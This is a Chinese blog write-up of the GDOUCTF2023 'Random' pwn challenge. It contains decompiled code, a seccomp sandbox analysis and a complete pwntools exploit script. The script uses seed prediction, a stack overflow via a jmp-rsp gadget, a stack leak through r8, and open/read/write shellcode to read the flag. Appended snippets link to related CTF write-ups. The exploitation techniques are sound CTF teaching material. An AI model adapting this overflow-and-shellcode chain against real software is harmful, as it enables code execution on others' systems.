[GDOUCTF2023] Random

最新推荐文章于 2024-10-26 21:40:50 发布
最新推荐文章于 2024-10-26 21:40:50 发布
阅读量404 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: pwn GDOUCTF 文章标签: 网络安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/JusticeUphold/article/details/130197837
文章详细介绍了如何利用C程序中的栈溢出漏洞,通过随机数种子的固定来预测随机数,从而触发特定函数。在面对seccomp限制和sandbox环境时,作者探讨了使用shellcode的方法,并通过调试发现并利用r8寄存器泄露栈地址,最终实现远程执行payload获取flag的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

第一次写题解,其中啰嗦和有错误的地方还望海涵,谢谢师傅们Orz
这道题核心有一个比较相近的题目,我先把题目放出来:

[极客大挑战 2019]Not Bad

一会我会叙述两个题之间的区别,还是很大的。
先拖IDA

int __cdecl main(int argc, const char **argv, const char **envp)
{
  unsigned int v3; // eax
  int v5; // [rsp+0h] [rbp-10h] BYREF
  int v6; // [rsp+4h] [rbp-Ch]
  int v7; // [rsp+8h] [rbp-8h]
  int i; // [rsp+Ch] [rbp-4h]

  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  v7 = 100;
  sandbox();
  v3 = time(0LL);
  srand(v3);
  for ( i = 0; i < v7; ++i )
  {
    v6 = rand() % 50;
    puts("please input a guess num:");
    if ( (unsigned int)__isoc99_scanf("%d", &v5) == -1 )
      exit(0);
    if ( getchar() != 10 )
      exit(1);
    if ( v6 == v5 )
    {
      puts("good guys");
      vulnerable();
    }
    else
    {
      puts("no,no,no");
    }
  }
  return 0;
}

首先显而易见的是main函数中有一个随机数取种并且循环一百次,每次判断你的输入和随机数是否相符的函数;
对此直接在python中调用c语言代码即可,由于线程开始时srand随机数取种都是相同的,所以可以保证判断通过。
 

from ctypes import *
cdll=CDLL('/lib/x86_64-linux-gnu/libc.so.6')#libc可以用过ldd指令查看路径哦
cdll.srand(cdll.time(0))

for i in range(100):
    io.recvuntil('please input a guess num:\n')
    io.sendline(str(cdll.rand()%50))
    s=io.recvline()

PS:道理我都懂,可为啥我的上一题通过了,但本题在异地没办法判断成功呢?我有点迷,大概率是随机数取种不同的原因吧qωq
喵喵喵,反正他有一百次判断,我每一次都随机一个数也是有可能撞上的,我只需要一次进入vulnerble函数就好了。

ssize_t vulnerable()
{
  char buf[32]; // [rsp+0h] [rbp-20h] BYREF

  puts("your door");
  return read(0, buf, 0x40uLL);
}

很简单的一个栈溢出,可以溢出0x40-0x20=0x20位。我们可以看到函数中没有shell执行区域,也没有system区域,那也就是说我们一般对于ROP题目来说只有shellcode或者libc这种两种解法了。但我们可以找找旁边的函数:

哦,我们找到非原生函数有haha sandbox和vulnerable,看下haha里面:

void haha()
{
  __asm { jmp     rsp }
}

checksec一下: 

有栈执行权限而且有返回到栈上的语句,我们可以考虑shellcode了。
桥豆麻袋!这个sandbox函数,可以看出是有沙盒限制的,我们进去具体看看:

int sandbox()
{
  __int16 v1; // [rsp+0h] [rbp-40h] BYREF
  __int16 *v2; // [rsp+8h] [rbp-38h]
  __int16 v3; // [rsp+10h] [rbp-30h] BYREF
  char v4; // [rsp+12h] [rbp-2Eh]
  char v5; // [rsp+13h] [rbp-2Dh]
  int v6; // [rsp+14h] [rbp-2Ch]
  __int16 v7; // [rsp+18h] [rbp-28h]
  char v8; // [rsp+1Ah] [rbp-26h]
  char v9; // [rsp+1Bh] [rbp-25h]
  int v10; // [rsp+1Ch] [rbp-24h]
  __int16 v11; // [rsp+20h] [rbp-20h]
  char v12; // [rsp+22h] [rbp-1Eh]
  char v13; // [rsp+23h] [rbp-1Dh]
  int v14; // [rsp+24h] [rbp-1Ch]
  __int16 v15; // [rsp+28h] [rbp-18h]
  char v16; // [rsp+2Ah] [rbp-16h]
  char v17; // [rsp+2Bh] [rbp-15h]
  int v18; // [rsp+2Ch] [rbp-14h]
  __int16 v19; // [rsp+30h] [rbp-10h]
  char v20; // [rsp+32h] [rbp-Eh]
  char v21; // [rsp+33h] [rbp-Dh]
  int v22; // [rsp+34h] [rbp-Ch]
  __int16 v23; // [rsp+38h] [rbp-8h]
  char v24; // [rsp+3Ah] [rbp-6h]
  char v25; // [rsp+3Bh] [rbp-5h]
  int v26; // [rsp+3Ch] [rbp-4h]

  v3 = 32;
  v4 = 0;
  v5 = 0;
  v6 = 4;
  v7 = 21;
  v8 = 0;
  v9 = 2;
  v10 = 0xC000003E;
  v11 = 32;
  v12 = 0;
  v13 = 0;
  v14 = 0;
  v15 = 21;
  v16 = 0;
  v17 = 1;
  v18 = 59;
  v19 = 6;
  v20 = 0;
  v21 = 0;
  v22 = 0;
  v23 = 6;
  v24 = 0;
  v25 = 0;
  v26 = 0x7FFF0000;
  v1 = 6;
  v2 = &v3;
  prctl(38, 1LL, 0LL, 0LL, 0LL);
  return prctl(22, 2LL, &v1);
}

 最核心的两个函数prtcl38和prtcl22可以看出来是把直接取得shell的方式ban掉了,稳健一下看看seccomp:

可以看出来只有execve被ban了,和我们想的一样,也就是标准orw。
orw问题推荐一篇博客:
浅谈 ORW
很不错可以看看。
具体就是用open打开flag,read读取flag,write写出flag。
最开始尝试着用类似我之前给出的那道题目的方式去做,方法即:

stack_start=0x7ffffffde000
payload=asm(shellcraft.read(0,stack_start,0x50))#把ORW组合读到栈上
payload+=asm("jmp rsi")
payload=payload.ljust(0x28,b'\x00')

jmp_rsp=0x40094E
payload+=p64(jmp_rsp)#跳到rsp就相当于到达下一句话
payload+=asm("sub rsp,48;jmp rsp")#返回到payload最初的位置,偏移量需要自己测算
payload=payload.ljust(0x40,b'\x00')
io.send(payload)

payload2=asm(shellcraft.open('./flag'))
payload2+=asm(shellcraft.read(3,0x601068,0x50))
payload2+=asm(shellcraft.write(1,0x601068,0x50))#经典ORW组合

io.send(payload2)
io.interactive()

但显然我忘记了一个重要的事情,那就是栈地址随机化
栈的地址不一定是0x7ffffffde000,最初我想到的做法是爆破,由于低三位地址和高三位地址都是可知的(最低三位000就好了,最高三位固定7ff),只需要爆破6位,但我想到了一个更好的办法:
不如我们先把栈地址用汇编语句泄露出来,然后再返回到vulnerable之后再进行写入ORW怎样呢?我觉得可行。

由此我在本地gdb了过后发现有几个能够泄露栈地址的寄存器:

 也就是说,rbxr13都是可以的,用shellcraft也很好写:

payload=asm(shellcraft.write(1,'rbx',0x10))
payload+=asm("mov rbx,0x40091D;jmp rbx")

payload=payload.ljust(0x28,b'\x00')

jmp_rsp=0x40094E
payload+=p64(jmp_rsp)
payload+=asm("sub rsp,48;jmp rsp")
payload=payload.ljust(0x40,b'\x00')

io.recvuntil('your door\n')
io.send(payload)
stack=u64(io.recv(6).ljust(8,b'\x00'))
print('stack:',hex(stack))

以上可以泄露出栈地址了,之后在基本影响不到关键控制字段的位置写进去ORW就好了

io.recvuntil('your door')

aim=stack-0x200

payload1=asm(shellcraft.read(0,aim,0x50))
payload1+=asm("jmp rsi")
payload1=payload1.ljust(0x28,b'\x00')
print('len:',hex(len(payload1)))
payload1+=p64(jmp_rsp)
payload1+=asm("sub rsp,48;jmp rsp")
payload1=payload1.ljust(0x40,b'\x00')

io.send(payload1)

io.send(payload2)

io.interactive()

ok本地flag成功取得。
但之后可是麻烦大了,最绝望的莫过于无法调试的异地一直EOF。
通过我上面输出的stack我可以发现,寄存器在异地的存储内容是不同的,所以我推测可以尝试输出所有寄存器试试。
于是我从rbx rcx r13 r12 rax rbp rsp(rdi和rdx会直接python报错EOF)最后发现r8是可以的。
直接取得flag了。
完整exp

from pwn import *
from ctypes import *
context(log_level='debug',arch='amd64',os='linux')

cdll=CDLL('/lib/x86_64-linux-gnu/libc.so.6')
io=process('./RANDOM')
#io=remote('node5.anna.nssctf.cn',28437)

cdll.srand(cdll.time(0))

payload2=asm(shellcraft.open('./flag'))
payload2+=asm(shellcraft.read(3,0x601068,0x50))
payload2+=asm(shellcraft.write(1,0x601068,0x50))

for i in range(100):
    io.recvuntil('please input a guess num:\n')
    io.sendline('1')
    s=io.recvline()
    print('s:',s)
    if len(s)==10:
        break
           #0x7ffefe218000
#这个我是真没办法了,毕竟异地随机数结果不同

gdb.attach(io)
payload=asm(shellcraft.write(1,'r8',0x10))
payload+=asm("mov rbx,0x40091D;jmp rbx")

payload=payload.ljust(0x28,b'\x00')

jmp_rsp=0x40094E
payload+=p64(jmp_rsp)
payload+=asm("sub rsp,48;jmp rsp")
payload=payload.ljust(0x40,b'\x00')

io.recvuntil('your door\n')
io.send(payload)
stack=u64(io.recv(6).ljust(8,b'\x00'))
print('stack:',hex(stack))

io.recvuntil('your door')

aim=stack-0x200

payload1=asm(shellcraft.read(0,aim,0x50))
payload1+=asm("jmp rsi")
payload1=payload1.ljust(0x28,b'\x00')
print('len:',hex(len(payload1)))
payload1+=p64(jmp_rsp)
payload1+=asm("sub rsp,48;jmp rsp")
payload1=payload1.ljust(0x40,b'\x00')

io.send(payload1)

io.send(payload2)

io.interactive()

完成!

PWN random [pwnable.kr]CTF writeup题解系列6
重新启程
01-01 815
目录 0x01 题目 0x02 解题思路 0x03 题解 0x01 题目 0x02 解题思路 题目比较简单,直接贴出过程 root@mypwn:/ctf/work/pwnable.kr# ssh random@pwnable.kr -p2222 random@pwnable.kr's password: ____ __ __ ____ ____ ...
[GDOUCTF 2023]Check_Your_Luck
2301_79234037的博客
03-14 469
我因为刚学,啥都不会,所以直接把他转成了txt文本,看里面内容。python代码运行结果。官方下载打开文件解压后是一个cpp文件。
[GDOUCTF 2023]Random
最新发布
sls2811的博客
10-26 209
所以只能使用orw方法,在栈上布置一段代码,然后通过haha中的汇编代码使程序的执行流到栈上,再打印。最初的思路是进入到vul函数后直接shellcode,但是由于有沙箱不起作用。将cat flag命令到栈上 执行后 使用orw输出。同时沙箱限制了execve 推测要使用orw。需要输入随机数,输入对了进入vul函数。查看题目可知 有可执行的栈段。在haha函数还有一段汇编。IDA中也提示了有沙箱。
CTF比赛中的random shuffle
四楼没电梯的专栏
09-26 855
在CTF(Capture The Flag)比赛中,随机洗牌题型的变形多种多样,不仅考验选手的逻辑推理和编程能力,还能考验对算法和数据结构的理解。本文将通过几个不同的场景,详细解析随机洗牌的变形及其解题思路。
青少年ctf-random(梅森算法-MT19973)
yuqie的博客
06-14 1254
这道题的漏洞在于这个函数: MT19973算法能生成1-623个32位随机数,而我们有 (32/32+64/32+96/32)*104=624个已知随机数,那么我们就完全可以求出下一个随机数。这里生成的一组数据里分别是32位、64位、96位,这里我们只需要32位,所以需要把64位和96位的数分成两个或者三个32位数,可以用它们与32位全为1的二进制数来分离。这里可以直接引用RandCrack库,将已经生成的624个数按顺序传入RandCrack函数里,利用predict_getrandbits来计算出下
ctf random 2017-赛客夏令营-Web-random
m0_60955130的博客
12-16 359
试题是这样的,这个网页会产生一个随机数,然后让你预测下一个随机数,很显然如果预测正确就会获得flag,那么我们如何预测一个随机数,我的想法就是猜测,当然如果靠人一次次猜测显然很难猜中,那么我就通过一个循环不停的产生随机数直到某一次他与页面所产生的随机数相同我们便可以获得falg,那么下面我们就通过python去的random库和requests库来实现这一功能。可以看到请求的方式是get那么我们有了这些信息就可以去编写代码了。首先我们先简单的写一个发送请求并打印返回信息的脚本。首先我们线观察一下网页。
[GKCTF 2021]Random
m0_57291352的博客
08-12 3555
[GKCTF 2021]Random 题目 import random from hashlib import md5 def get_mask(): file = open("random.txt","w") for i in range(104): file.write(str(random.getrandbits(32))+"\n") file.write(str(random.getrandbits(64))+"\n") file.
CTF之java伪随机数random函数破解 预测
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
10-25 3811
某个后台访问之后,首先映入眼帘的只有一个登录框 抓包如下: 多了个空的csrf_token值,人工尝试弱密码,无果,小脑袋瓜装不了那么多字典。因为有源码,看看源码怎么说: 大概意思就是当cookie_token不等于空,并且等于csrf_token的时候,会去数据库判断有没有这个用户。否则就会创建一个密码随机,用户为admin的记录。 那接下来有两个思路: 1、爆破,也就9位数,让数据库填满admin的密码,到时候随你挑。 2、搞定这个伪随机 在师傅疯狂暗示下,我放弃了暴力美学,走上了第二条路,有大佬
[CTF/randcrack]python随机数预测模块分析及改进方案
qq_42557115的博客
12-07 8537
CTF randcrack模块原理分析 Python random库破解,部分例题利用介绍,randcrack库改进优化策略分析
GDOUCTF2023 Crypto Pwn
qq_41626232的博客
04-16 4373
比赛用的蠢方法做的,发现x为52位时可以使用small_roots,(这个很好找到上界,没考虑epsilon参数)然后简单爆破2^12=4096解空间。这个用ctypes库加载libc文件,然后随机数就一模一样了,没见过的话,可以看一看,感觉很好用。参数的默认值为0.05,该默认参数下的bound不足以解出本题的小整数解,根据。我做的时候忘记看题目名字了,溢出大小还行,用常规的ret2libc做的。我直接把fake的base64密文全删了,然后就给了一个压缩包出来了。这不是misc题吗?
GDOUCTF2023 Writeup
S4n_v1的博客
04-16 1899
钝角
NSSCTF fakerandom
m0_63735735的博客
08-05 481
NSSCTF fakerandom
某不知名ctfer选手的第二周周报和XYCTF部分题解
2303_79366759的博客
04-28 1115
free()函数一个hook也就是__free_hook,当在执行free函数的时候,会先检查有没有hook,如果不为0,那么在free(i)时就会把__free_hook作为函数指针调用,这时rdi会是原本要free的堆块指针,那么聪明的人已经能想到怎么攻击了,没错就是把__free_hook改成system,再把要free的堆块填入字符串,那么在free这个堆块时,就可以执行system("/bin/sh")了。那么问题来了,,这个固定大小为0xc的堆块保存的是什么内容,执行的是什么功能呢?
pwn-随机计算题类型
IT_huanhuan的博客
05-25 1786
沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,**只能采取open/read/write的组合方式来读取flag。
关于栈迁移的那些事儿
蚁景网安学院
07-27 584
现在的CTF比赛中很难在大型比赛中看到栈溢出类型的赛题,而即使遇到了也是多种利用方式组合出现,尤其以栈迁移配合其他利用方式来达到组合拳的效果,本篇文章意旨通过原理+例题的形式带领读者一步步理解栈迁移的原理以及在ctf中的应用。......
pwn -- 沙盒机制详解
lifanxin的博客
05-13 6765
沙盒机制详解概述开启沙盒的两种方式prctl函数调用seccomp库函数使用seccomp-tools识别沙盒两道例题pwnable_asm参考博客总结 概述   沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。   在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,只
[GDOUCTF 2023]受不了一点
2301_80189829的博客
12-13 444
查看 $_POST['gdou']`和$_POST['ctf']`是否被设置,设置就往下走,并把$_POST['gdou']`和$_POST['ctf']`附给$a和$b。若未被设置就会输出“别来沾边”。然后看$_GET['aaa']和$_GET['bbb']是否被设置,若被设置就将$_GET['aaa']和$_GET['bbb']的值分别赋给$aaa和$bbb不符合就会输出“行不行啊细狗”得NSSCTF{67b41e80-814f-4c17-baac-a6dcb1e02d03}打开链接发现是代码审计。
NewStarCTF pwn
iczfy585的博客
10-21 1241
NewStarCTF中pwn的一些wp
CTF--伪随机数爆破
weixin_44711063的博客
03-30 3046
CTF–伪随机数爆破 题目:一个由纯汇编编写的CrackMe,要求输入正确密码,不能直接爆破 .题目分析: 1、先托到PE文件查看工具里看看,发现这软件有TLS表,几乎就可以直接判断它带有了反调试,具体是怎样反调试还得详细查看 2、将程序先丢进OD,没有断下,很正常。因为有反调试嘛 3、于是我们设置在TLS下断 ( 需要OD有这个插件 )或者直接查看TLS表中AddressOfCallBacks来得到第一个callback函数的地址,这里是0x402000 4、直接在0x402000这里下断,重新运
C#实现的Random算法源码分享
在探讨由Visual Studio 2005环境使用C#语言编写Random算法源代码的知识点时,首先需要了解Random类是.NET框架提供的一个用于生成伪随机数的工具类。Random类基于线性同余公式生成随机数,适用于一般性的随机数需求,...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值